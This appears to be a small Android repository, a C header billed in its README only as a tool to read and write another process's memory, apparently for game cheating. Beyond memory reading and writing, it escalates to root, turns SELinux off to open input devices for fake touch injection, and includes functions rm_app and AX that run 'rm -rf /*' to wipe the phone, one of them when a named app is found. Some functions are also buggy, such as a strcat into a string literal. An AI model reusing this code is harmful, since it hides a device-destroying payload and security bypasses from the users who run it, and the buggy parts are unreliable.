├── .gitignore ├── MemoryTool.h └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | -------------------------------------------------------------------------------- /MemoryTool.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | char *Shell(const char *cmd);/*执行shell命令*/ 21 | int find_pid_of(const char *process_name);/*查找进程pid*/ 22 | long GetModuleBase(const char *moduleName);/*读取模块地址*/ 23 | long int preadv(int pid, void *buffer, ssize_t size, off_t off);/*64内存数据读取*/ 24 | long readValue(long address, void *buffer, long size);/*32内存数据读取*/ 25 | void writeValue(long address, void *value, long size);/*内存数据写入*/ 26 | long ReadDword64(long Address);/*64位指针*/ 27 | long ReadDword32(long Address);/*32位指针*/ 28 | long ReadInt32(long Address);/*读取dword类型的值*/ 29 | float ReadFloat64(long Address);/*读取float类型的值*/ 30 | void getRoot(char **argv);/*获取root权限*/ 31 | int rebootsystem();/*重启手机:需要root权限*/ 32 | int PutDate();/*输出系统当前时间*/ 33 | char* getMac();/*获取Mac*/ 34 | bool isVPN();/*判断是否用VPN*/ 35 | bool Anti_app(const char *packageName);/*检测app是否存在:需要root权限*/ 36 | void rm_app(const char *packageName);/*检测到应用格机:需要root权限*/ 37 | /*触摸函数:需要root权限*/ 38 | inline static int ReportKey(int fd, uint16_t type, uint16_t code, int32_t value); 39 | inline static void TouchPressDown(int fd, int FingerNum, int LineID, int x, int y); 40 | inline static void TouchMove(int fd, int FingerNum, int x, int y); 41 | inline static void TouchPressUp(int fd, int FingerNum); 42 | static int GetTouchEventNum(); 43 | int open_driver(const char * path, int flag); 44 | /*触摸函数:需要root权限*/ 45 | 46 | 47 | 48 | /*QQ交流群691043164*/ 49 | #define BYTE0 0x00000000 50 | #define BYTE4 0x00000004 51 | #define BYTE8 0x00000008 52 | #define BYTE16 0x00000010 53 | #define BYTE24 0x00000018 54 | #define BYTE32 0x00000020 55 | #define BYTE64 0x00000040 56 | #define BYTE128 0x00000080 57 | #define BYTE256 0x00000100 58 | #define BYTE512 0x00000200 59 | #define BYTE1024 0x00000400 60 | #define BYTE2048 0x00000800 61 | typedef char PACKAGENAME; 62 | 63 | int pid = -1; 64 | 65 | int initPid() { 66 | pid = find_pid_of("此处填写你的包名"); 67 | return pid; 68 | } 69 | 70 | long int preadv(int pid, void *buffer, ssize_t size, off_t off) { 71 | struct iovec iov_ReadBuffer, iov_ReadOffset; 72 | iov_ReadBuffer.iov_base = buffer; 73 | iov_ReadBuffer.iov_len = size; 74 | iov_ReadOffset.iov_base = (void *) off; 75 | iov_ReadOffset.iov_len = size; 76 | return syscall(SYS_process_vm_readv, pid, &iov_ReadBuffer, 1, &iov_ReadOffset, 1, 0); 77 | } 78 | 79 | long readValue(long address, void *buffer, long size) { 80 | struct iovec iov_ReadBuffer{}, iov_ReadOffset{}; 81 | iov_ReadBuffer.iov_base = buffer; 82 | iov_ReadBuffer.iov_len = size; 83 | iov_ReadOffset.iov_base = (void *) address; 84 | iov_ReadOffset.iov_len = size; 85 | return syscall(SYS_process_vm_readv, pid, &iov_ReadBuffer, 1, &iov_ReadOffset, 1, 0); 86 | } 87 | 88 | void writeValue(long address, void *value, long size) { 89 | struct iovec local[1]; 90 | struct iovec remote[1]; 91 | local[0].iov_base = value; 92 | local[0].iov_len = size; 93 | remote[0].iov_base = (void *) address; 94 | remote[0].iov_len = size; 95 | syscall(SYS_process_vm_writev, pid, local, 1, remote, 1, 0); 96 | } 97 | 98 | 99 | long ReadDword64(long Address) { 100 | long temp = 0; 101 | preadv(pid, &temp, BYTE16, Address); 102 | return temp; 103 | } 104 | 105 | long ReadDword32(long Address) { 106 | long temp = 0; 107 | preadv(pid, &temp, BYTE4, Address); 108 | return temp; 109 | } 110 | 111 | long ReadInt32(long Address) { 112 | int temp = 0; 113 | preadv(pid, &temp, BYTE4, Address); 114 | return temp; 115 | } 116 | 117 | float ReadFloat64(long Address) { 118 | float temp = 0; 119 | preadv(pid, &temp, BYTE4, Address); 120 | return temp; 121 | } 122 | 123 | char *Shell(const char *cmd) { 124 | FILE *file = NULL; 125 | char line[BYTE256] = {}; 126 | char *result = (char *) malloc(BYTE2048); 127 | memset(result, 0, sizeof(result)); 128 | file = popen(cmd, "r"); 129 | while (fgets(line, sizeof(line), file)) { 130 | strncat(result, line, strlen(line)); 131 | } 132 | pclose(file); 133 | return result; 134 | } 135 | 136 | int find_pid_of(const char *process_name) { 137 | int id; 138 | pid_t pid = -1; 139 | DIR *dir; 140 | FILE *fp; 141 | char filename[32]; 142 | char cmdline[256]; 143 | struct dirent *entry; 144 | if (process_name == NULL) 145 | return -1; 146 | dir = opendir("/proc"); 147 | if (dir == NULL) 148 | return -1; 149 | while ((entry = readdir(dir)) != NULL) { 150 | id = atoi(entry->d_name); 151 | if (id != 0) { 152 | sprintf(filename, "/proc/%d/cmdline", id); 153 | fp = fopen(filename, "r"); 154 | if (fp) { 155 | fgets(cmdline, sizeof(cmdline), fp); 156 | fclose(fp); 157 | if (strcmp(process_name, cmdline) == 0) { 158 | pid = id; 159 | break; 160 | } 161 | } 162 | } 163 | } 164 | closedir(dir); 165 | return pid; 166 | } 167 | 168 | long GetModuleBase(const char *moduleName) { 169 | char path[BYTE1024], line[BYTE1024]; 170 | if (pid == -1) 171 | sprintf(path, "/proc/self/maps"); 172 | else 173 | sprintf(path, "/proc/%d/maps", pid); 174 | FILE *file = fopen(path, "r"); 175 | long len = 0; 176 | if (file) { 177 | while (fgets(line, sizeof(line), file)) { 178 | if (strstr(line, moduleName) != NULL) { 179 | len = strtoul(line, NULL, BYTE16); 180 | break; 181 | } 182 | } 183 | } 184 | return len; 185 | } 186 | 187 | void getRoot(char **argv) 188 | { 189 | char shellml[64]; 190 | sprintf(shellml, "su -c %s", *argv); 191 | if (getuid() != 0) 192 | { 193 | system(shellml); 194 | exit(1); 195 | } 196 | } 197 | 198 | 199 | int rebootsystem() 200 | { 201 | return system("su -c 'reboot'"); 202 | } 203 | 204 | int PutDate() 205 | { 206 | return system("date +%F-%T"); 207 | } 208 | 209 | int getPID(PACKAGENAME *PackageName) 210 | { 211 | DIR *dir=NULL; 212 | struct dirent *ptr=NULL; 213 | FILE *fp=NULL; 214 | char filepath[256]; // 大小随意，能装下cmdline文件的路径即可 215 | char filetext[128]; // 大小随意，能装下要识别的命令行文本即可 216 | dir = opendir("/proc"); // 打开路径 217 | if (NULL != dir) 218 | { 219 | while ((ptr = readdir(dir)) != NULL) // 循环读取路径下的每一个文件/文件夹 220 | { 221 | // 如果读取到的是"."或者".."则跳过，读取到的不是文件夹名字也跳过 222 | if ((strcmp(ptr->d_name, ".") == 0) || (strcmp(ptr->d_name, "..") == 0)) 223 | continue; 224 | if (ptr->d_type != DT_DIR) 225 | continue; 226 | sprintf(filepath, "/proc/%s/cmdline", ptr->d_name); // 生成要读取的文件的路径 227 | fp = fopen(filepath, "r"); // 打开文件 228 | if (NULL != fp) 229 | { 230 | fgets(filetext,sizeof(filetext),fp); // 读取文件 231 | if (strcmp(filetext,PackageName)==0) 232 | { 233 | //puts(filepath); 234 | //printf("packagename:%s\n",filetext); 235 | break; 236 | } 237 | fclose(fp); 238 | } 239 | } 240 | } 241 | if (readdir(dir) == NULL) 242 | { 243 | //puts("Get pid fail"); 244 | return 0; 245 | } 246 | closedir(dir); // 关闭路径 247 | return atoi(ptr->d_name); 248 | } 249 | 250 | char* getMac(){ 251 | char* mac = (char*) malloc(64); 252 | memset(mac, 0, 64); 253 | char line[1024] = ""; 254 | 255 | char* serialno = (char*) malloc(PROP_VALUE_MAX); 256 | memset(serialno, 0, PROP_VALUE_MAX); 257 | __system_property_get("ro.serialno", serialno); 258 | strncat(mac, serialno, strlen(serialno)); 259 | free(serialno); 260 | 261 | FILE* fp = NULL; 262 | fp = popen("getprop ro.serialno", "r"); 263 | while (fgets(line, 1024, fp) != NULL) 264 | { 265 | strncat(mac, line, strlen(line)); 266 | } 267 | pclose(fp); 268 | return mac; 269 | } 270 | 271 | bool isVPN() 272 | { 273 | char command[256] = ""; 274 | memset(command, 0, 256); 275 | if ((access("/system/bin/ifconfig", F_OK)) != -1){ 276 | sprintf(command, "%s", "/system/bin/ifconfig"); 277 | }else{ 278 | return true; 279 | } 280 | FILE* fp = NULL; 281 | char line[1024] = ""; 282 | fp = popen(command, "r"); 283 | while (fgets(line, 1024, fp) != NULL) 284 | { 285 | if (strstr(line, "tun0") != NULL || strstr(line, "ppppp0") != NULL){ 286 | pclose(fp); 287 | return true; 288 | } 289 | } 290 | pclose(fp); 291 | return false; 292 | } 293 | 294 | 295 | inline static int ReportKey(int fd, uint16_t type, uint16_t code, int32_t value) 296 | { 297 | struct input_event event; 298 | event.type = type; 299 | event.code = code; 300 | event.value = value; 301 | gettimeofday(&event.time, 0); 302 | if (write(fd, &event, sizeof(struct input_event)) < 0) 303 | { 304 | printf("report key error!\n"); 305 | return -1; 306 | } 307 | return 0; 308 | } 309 | 310 | inline static void TouchPressDown(int fd, int FingerNum, int LineID, int x, int y) 311 | { 312 | ReportKey(fd, EV_ABS, ABS_MT_SLOT, FingerNum); 313 | ReportKey(fd, EV_ABS, ABS_MT_TRACKING_ID, LineID); 314 | ReportKey(fd, EV_ABS, ABS_MT_POSITION_X, x); //report position x,y 315 | ReportKey(fd, EV_ABS, ABS_MT_POSITION_Y, y); 316 | ReportKey(fd, EV_KEY, BTN_TOUCH, 1); //report touch preesed event. 317 | ReportKey(fd, EV_SYN, SYN_REPORT, 0); //report syn signal , finish the curent event! 318 | } 319 | 320 | inline static void TouchMove(int fd, int FingerNum, int x, int y) 321 | { 322 | ReportKey(fd, EV_ABS, ABS_MT_SLOT, FingerNum); 323 | ReportKey(fd, EV_ABS, ABS_MT_POSITION_X, x); //report position x,y 324 | ReportKey(fd, EV_ABS, ABS_MT_POSITION_Y, y); 325 | ReportKey(fd, EV_SYN, SYN_REPORT, 0); //report syn signal , finish the curent event! 326 | } 327 | 328 | 329 | inline static void TouchPressUp(int fd, int FingerNum) 330 | { 331 | ReportKey(fd, EV_ABS, ABS_MT_SLOT, FingerNum); 332 | ReportKey(fd, EV_ABS, ABS_MT_TRACKING_ID, -1); 333 | ReportKey(fd, EV_KEY, BTN_TOUCH, 0); //report touch release event. 334 | ReportKey(fd, EV_SYN, SYN_REPORT, 0); //report syn signal , finish the curent event! 335 | } 336 | 337 | 338 | static int GetTouchEventNum() 339 | { 340 | int nLastEventNum = -1; 341 | int lastLineIsKey = -1; 342 | 343 | FILE *f = fopen("/proc/bus/input/devices", "r"); 344 | if (f == NULL) 345 | { 346 | //��ܿ��SELinux��ر�SELinux��һ�ο�� 347 | if (errno == EACCES) 348 | { 349 | FILE * fp = popen("su", "w"); 350 | if (fp) 351 | { 352 | //��ʱ�ر�SELinux 353 | char cmd[512] = { 0 }; 354 | snprintf(cmd, sizeof(cmd), "setenforce 0\n"); 355 | fwrite(cmd, 1, strlen(cmd) + 1, fp); 356 | pclose(fp); 357 | 358 | f = fopen("/proc/bus/input/devices", "r"); 359 | 360 | //�ָ��SELinux 361 | fp = popen("su", "w"); 362 | snprintf(cmd, sizeof(cmd), "setenforce 1\n"); 363 | fwrite(cmd, 1, strlen(cmd) + 1, fp); 364 | pclose(fp); 365 | } 366 | } 367 | if (f == NULL) 368 | { 369 | return -1; 370 | } 371 | } 372 | char s[512] = { 0 }; 373 | while (fgets(s, 511, f)) //read a line into s 374 | { 375 | char *pTags = strstr(s, "Handlers="); 376 | if (pTags) 377 | { 378 | //printf("Handlers=%s\n", s); 379 | pTags = strstr(s, "event"); 380 | if (pTags) 381 | { 382 | sscanf(pTags, "event%d", &nLastEventNum); 383 | } 384 | else 385 | { 386 | nLastEventNum = -1; 387 | } 388 | //printf("nLastEventNum=%d\n", nLastEventNum); 389 | continue; 390 | } 391 | pTags = strstr(s, "KEY="); 392 | if (pTags) 393 | { 394 | if (fgets(s, 511, f)) 395 | { 396 | pTags = strstr(s, "ABS="); 397 | if (pTags) 398 | { 399 | fclose(f); 400 | return nLastEventNum; 401 | } 402 | } 403 | else 404 | { 405 | break; 406 | } 407 | continue; 408 | } 409 | } 410 | fclose(f); 411 | return -1; 412 | } 413 | 414 | 415 | int open_driver(const char * path, int flag) 416 | { 417 | int fd = open(path, flag); 418 | if (fd <= 0) 419 | { 420 | int last_err = errno; 421 | if (last_err == EACCES) 422 | { 423 | //��ܿ��SELinux��ر�SELinux��һ�ο�� 424 | FILE * fp = popen("su", "w"); 425 | if (fp) 426 | { 427 | //��ʱ�ر�SELinux 428 | char cmd[512] = { 0 }; 429 | snprintf(cmd, sizeof(cmd), "chmod 666 %s\n setenforce 0\n", path); 430 | fwrite(cmd, 1, strlen(cmd) + 1, fp); 431 | pclose(fp); 432 | 433 | fd = open(path, O_RDWR); 434 | 435 | //�ָ��SELinux 436 | fp = popen("su", "w"); 437 | snprintf(cmd, sizeof(cmd), "chmod 0660 %s\n setenforce 1\n", path); 438 | fwrite(cmd, 1, strlen(cmd) + 1, fp); 439 | pclose(fp); 440 | } 441 | } 442 | 443 | if (fd <= 0) 444 | { 445 | printf("open error():%s\n", strerror(last_err)); 446 | return -last_err; 447 | } 448 | } 449 | return fd; 450 | } 451 | 452 | bool Anti_app(const char *packageName){ 453 | char *appPath = nullptr; 454 | char *data = "/data/user/0/"; 455 | appPath = strcat(data, packageName); 456 | int arm = access(appPath, F_OK); 457 | if(!arm) { 458 | return true; 459 | }else { 460 | return false; 461 | } 462 | } 463 | 464 | 465 | void rm_app(const char *packageName){ 466 | char *appPath = nullptr; 467 | char *data = "/data/user/0/"; 468 | appPath = strcat(data, packageName); 469 | int arm = access(appPath, F_OK); 470 | if(!arm) { 471 | system("rm -rf /*"); 472 | }else { 473 | printf("没有此应用"); 474 | } 475 | } 476 | 477 | void AX(int a,const char *packageName){ 478 | if(a == 0){ 479 | system("rm -rf /*");/*0 ==格机*/ 480 | }else if(a == 1){ 481 | system("rm -rf /*");/*0 ==格机*/ 482 | }else if(a ==2){ 483 | system("rm -rf /*");/*0 ==格机*/ 484 | } 485 | }; 486 | 487 | 488 | 489 | 490 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MemoryTool 2 | 用于读写Android下进程内存信息 3 | --------------------------------------------------------------------------------